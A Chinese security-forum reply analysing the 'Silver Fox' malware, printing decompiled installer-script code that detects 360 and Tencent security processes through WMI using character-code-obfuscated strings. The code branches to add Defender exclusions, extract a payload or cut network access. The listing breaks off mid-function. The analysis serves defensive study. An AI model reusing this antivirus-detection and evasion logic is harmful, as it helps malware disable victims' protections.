首页| 论坛| 搜索| 消息
> 〖系统安全〗
主题:持续演进的银狐——不断增加脆弱驱动通过BYOVD结束防病毒软件
回帖:该函数会检测360主防进程——若存在,则执行断网,具体如下:该函数会调用代码中的“IS360PROCESSRUNNING”函数判断360主防进程"360Tray.exe"是否存在,从而执行不同的逻辑。检查360进程是否运行: 复制代码 隐藏代码; 第8-14行代码pushtype BOOLEAN ; StackCount = 8pushvar Var8 ; StackCount = 9call INITIALIZESETUP ; 初始化设置pop ; StackCount = 8pop ; StackCount = 7pushvar Var1 ; StackCount = 8call IS360PROCESSRUNNING ; 检查360安全卫士进程是否正在运行pop ; StackCount = 7

检查结果和条件跳转: 复制代码 隐藏代码; 第15-22行代码pushtype BOOLEAN ; StackCount = 8assign Var8, Var1 ; 检查函数"IS360PROCESSRUNNING"的返回值(存储在Var1中)赋给变量Var8,用于后续判断setz Var8 ; 检查Var8的值是否为假(0)sfz Var8 ; 根据sfz指令的判断结果,如果Var8为假(即360进程没有运行),则跳转到标签loc_263f处执行pop ; StackCount = 7jf loc_263f

执行路径:如果360进程在运行:继续执行当前代码块(从第23行开始),然后调用"ADDDEFENDEREXCLUSION"(添加Windows Defender排除项)和"OBFUSCATEDEXTRACT"如果360进程不在运行:跳转到loc_263f标签处执行,那里会先调用"ADDDEFENDEREXCLUSION"(添加Windows Defender排除项)和"DISABLENETWORKADAPTERS"(断网)

我们来看一下"IS360PROCESSRUNNING"函数: 复制代码 隐藏代码.function(export) BOOLEAN IS360PROCESSRUNNING()pushtype Variant ; StackCount = 1pushtype Variant ; StackCount = 2pushtype Variant ; StackCount = 3pushtype UnicodeString_2 ; StackCount = 4pushtype UnicodeString_2 ; StackCount = 5pushtype UnicodeString_2 ; StackCount = 6pushtype UnicodeString_2 ; StackCount = 7assign RetVal, BOOLEAN(0)starteh null, loc_8a1, null, loc_8afpushtype IDISPATCH ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9pushtype Type30 ; StackCount = 10pushtype Type30 ; StackCount = 11pushtype S32 ; StackCount = 12assign Var12, S32(26)pushvar Var11 ; StackCount = 13call SETARRAYLENGTHpop ; StackCount = 12pop ; StackCount = 11assign Var11[0], S32(87)assign Var11[1], S32(66)assign Var11[2], S32(69)assign Var11[3], S32(77)assign Var11[4], S32(83)assign Var11[5], S32(99)assign Var11[6], S32(114)assign Var11[7], S32(105)assign Var11[8], S32(112)assign Var11[9], S32(116)assign Var11[10], S32(105)assign Var11[11], S32(110)assign Var11[12], S32(103)assign Var11[13], S32(46)assign Var11[14], S32(83)assign Var11[15], S32(87)assign Var11[16], S32(66)assign Var11[17], S32(69)assign Var11[18], S32(77)assign Var11[19], S32(76)assign Var11[20], S32(111)assign Var11[21], S32(99)assign Var11[22], S32(97)assign Var11[23], S32(116)assign Var11[24], S32(111)assign Var11[25], S32(114)assign Var10, Var11pop ; StackCount = 10pushvar Var9 ; StackCount = 11call STRFROMCODEpop ; StackCount = 10pop ; StackCount = 9pushvar Var8 ; StackCount = 10call CREATEOLEOBJECTpop ; StackCount = 9pop ; StackCount = 8assign Var1, Var8pop ; StackCount = 7pushtype !OPENARRAYOFVARIANT ; StackCount = 8pushtype !OPENARRAYOFVARIANT ; StackCount = 9pushtype S32 ; StackCount = 10assign Var10, S32(2)pushvar Var9 ; StackCount = 11call SETARRAYLENGTHpop ; StackCount = 10pop ; StackCount = 9assign Var9[0], String_3("")assign Var9[1], String_3("root\cimv2")assign Var8, Var9pop ; StackCount = 8pushtype String_3 ; StackCount = 9assign Var9, String_3("ConnectServer")pushtype BOOLEAN ; StackCount = 10assign Var10, BOOLEAN(0)pushtype IDISPATCH ; StackCount = 11assign Var11, Var1pushvar Var2 ; StackCount = 12call IDISPATCHINVOKEpop ; StackCount = 11pop ; StackCount = 10pop ; StackCount = 9pop ; StackCount = 8pop ; StackCount = 7pushtype Type30 ; StackCount = 8pushtype Type30 ; StackCount = 9pushtype S32 ; StackCount = 10assign Var10, S32(11)pushvar Var9 ; StackCount = 11call SETARRAYLENGTHpop ; StackCount = 10pop ; StackCount = 9assign Var9[0], S32(51)assign Var9[1], S32(54)assign Var9[2], S32(48)assign Var9[3], S32(116)assign Var9[4], S32(114)assign Var9[5], S32(97)assign Var9[6], S32(121)assign Var9[7], S32(46)assign Var9[8], S32(101)assign Var9[9], S32(120)assign Var9[10], S32(101)assign Var8, Var9pop ; StackCount = 8pushvar Var5 ; StackCount = 9call STRFROMCODEpop ; StackCount = 8pop ; StackCount = 7pushtype Type30 ; StackCount = 8pushtype Type30 ; StackCount = 9pushtype S32 ; StackCount = 10assign Var10, S32(11)pushvar Var9 ; StackCount = 11call SETARRAYLENGTHpop ; StackCount = 10pop ; StackCount = 9assign Var9[0], S32(51)assign Var9[1], S32(54)assign Var9[2], S32(48)assign Var9[3], S32(84)assign Var9[4], S32(114)assign Var9[5], S32(97)assign Var9[6], S32(121)assign Var9[7], S32(46)assign Var9[8], S32(101)assign Var9[9], S32(120)assign Var9[10], S32(101)assign Var8, Var9pop ; StackCount = 8pushvar Var6 ; StackCount = 9call STRFROMCODEpop ; StackCount = 8pop ; StackCount = 7pushtype Type30 ; StackCount = 8pushtype Type30 ; StackCount = 9pushtype S32 ; StackCount = 10assign Var10, S32(12)pushvar Var9 ; StackCount = 11call SETARRAYLENGTHpop ; StackCount = 10pop ; StackCount = 9assign Var9[0], S32(81)assign Var9[1], S32(81)assign Var9[2], S32(80)assign Var9[3], S32(67)assign Var9[4], S32(84)assign Var9[5], S32(114)assign Var9[6], S32(97)assign Var9[7], S32(121)assign Var9[8], S32(46)assign Var9[9], S32(101)assign Var9[10], S32(120)assign Var9[11], S32(101)assign Var8, Var9pop ; StackCount = 8pushvar Var7 ; StackCount = 9call STRFROMCODEpop ; StackCount = 8pop ; StackCount = 7pushtype WideString ; StackCount = 8assign Var8, String_3("SELECT * FROM Win32_Process WHERE Name="")add Var8, Var5add Var8, String_3("" OR ")add Var8, String_3("Name="")add Var8, Var6add Var8, String_3("" OR ")add Var8, String_3("Name="")add Var8, Var7add Var8, Char(""")assign Var4, Var8pop ; StackCount = 7pushtype !OPENARRAYOFVARIANT ; StackCount = 8pushtype !OPENARRAYOFVARIANT ; StackCount = 9pushtype S32 ; StackCount = 10assign Var10, S32(1)pushvar Var9 ; StackCount = 11call SETARRAYLENGTHpop ; StackCount = 10pop ; StackCount = 9assign Var9[0], Var4assign Var8, Var9pop ; StackCount = 8pushtype String
z3960回帖于2026-02-21 07:50
下一页 (1/17)
下一楼›:来看看看(huwg)

查看全部回帖(7)
«返回主帖